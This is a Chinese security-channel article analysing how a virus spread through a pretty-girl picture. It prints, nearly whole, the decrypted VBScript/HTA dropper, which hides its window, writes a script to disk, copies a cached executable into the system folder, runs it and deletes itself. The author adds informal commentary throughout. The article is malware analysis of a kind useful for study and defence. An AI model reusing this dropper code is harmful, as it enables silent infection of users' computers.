网络安全 频道

美女图片传病毒美女杀手传播过程全解

    看到了么,尾巴露出来了!!!,这两个文件可是关键啊。于是乎,下载了这两个文件。(扩展名就随意了)。

    我先打开了winups.asp(是用记事本打开的,我发现文件开头有MZ字样),哈哈,原来这是一个.exe文件。先不理会他,看看另一个,另一个相对简单,打开之后一看是一段脚本代码(可恶,竟然又加密了)。没办法,解密,得到如下代码:

    <object id=''wsh'' classid=''clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B''></object>

    <HTA:APPLICATION caption="no" border="none" visiable="no" windowState="minimize" >

    。。。。这是在建立脚本对象

    <script LaNGUAGE="VBScript.Encode">

    window.moveTo -100,-100

    。。。。哈哈,竟然用这种隐藏窗体的方法

    Set g_fs = CreateObject("Scripting.FileSystemObject")

    Set tf = g_fs.CreateTextFile("c:\isp.hta",true)

    。。。。看看,来了不是,开始文件操作了吧

    tf.write "<HTA:APPLICATION caption=" & CHR(34)& "no" & CHR(34)& " border=" & CHR(34)& "none" & CHR(34)& " visiable=" & CHR(34)& "no" & CHR(34)& " showintaskbar=" & CHR(34)& "no" & CHR(34)& " >" &chr(13)&chr(10)

    。。。。。看来作者是要用脚本来写脚本了,够狠!!!

    tf.write "<object id=''wsh'' cl"& chr(97)&"ssid=''clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B''></object>"&chr(13)&chr(10)

    。。。。。F935DC22-1CF0-11D0-ADB9-00C04FD58A0B 是WSH的sid

    tf.write "<" & "script LANGUAGE=" & CHR(34)& "VBScript" & CHR(34)& ">"&chr(13)&chr(10)

    tf.write "on error resume next"&chr(13)&chr(10)

    tf.write "window.moveTo -100,-100"&chr(13)&chr(10)

    tf.write "window.resizeTo 0,0 "&chr(13)&chr(10)

    tf.write "dim exepath"&chr(13)&chr(10)

    tf.write "Function Search(objFolder) "&chr(13)&chr(10)

    tf.write "Dim objSubFolder"&chr(13)&chr(10)

    tf.write "For Each objFile in objFolder.Files"&chr(13)&chr(10)

    tf.write "If InStr(1, objfile.name, " & CHR(34)& "winups" & CHR(34)& ", vbtextcompare) then"&chr(13)&chr(10)

    tf.write "set filecp = objg_fso.getfile(objfile.path)"&chr(13)&chr(10)

    tf.write "filecp.copy (exepath)"&chr(13)&chr(10)

    tf.write "exit for"&chr(13)&chr(10)

    tf.write "End If"&chr(13)&chr(10)

    tf.write "Next "&chr(13)&chr(10)

    tf.write "For Each objSubFolder in objFolder.SubFolders "&chr(13)&chr(10)

    tf.write "Search objSubFolder"&chr(13)&chr(10)

    tf.write "Next"&chr(13)&chr(10)

    tf.write "End Function"&chr(13)&chr(10)

    。。。。这个函数是找到winups哪个文件,然后复制到系统目录下 。。。。

    tf.write "Set objg_fso = CreateObject(" & CHR(34)& "Scripting.FileSystemObject" & CHR(34)& ")"&chr(13)&chr(10)

    tf.write "str=WSH.regread(" & CHR(34)&   "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache" & CHR(34)& ")"&chr(13)&chr(10)

    。。。。这是在寻找缓存目录

    tf.write "set tempfolder = objg_fso.getfolder(str)"&chr(13)&chr(10)

    tf.write "set othisfolder = objg_fso.GetSpecialFolder(1)" &chr(13)&chr(10)

    tf.write "exepath=othisfolder.path & "& chr(34) & "\win.exe" & chr(34) &chr(13)&chr(10)

    tf.write "search tempfolder"&chr(13)&chr(10)

    。。。。真是的,还要复制到系统目录下,可恶

    tf.write "wsh.run (exepath)"&chr(13)&chr(10)

    tf.write "wsh.run " & CHR(34)& "command.com /c del c:\isp.hta" & CHR(34)& " ,0"&chr(13)&chr(10)

    。。。。呵呵,还不忘了删除自己,习惯不错,值得学习

    tf.write "window.close()"&chr(13)&chr(10)

    tf.write "<" &chr(47)& "script>"&chr(13)&chr(10)

    tf.close

0
相关文章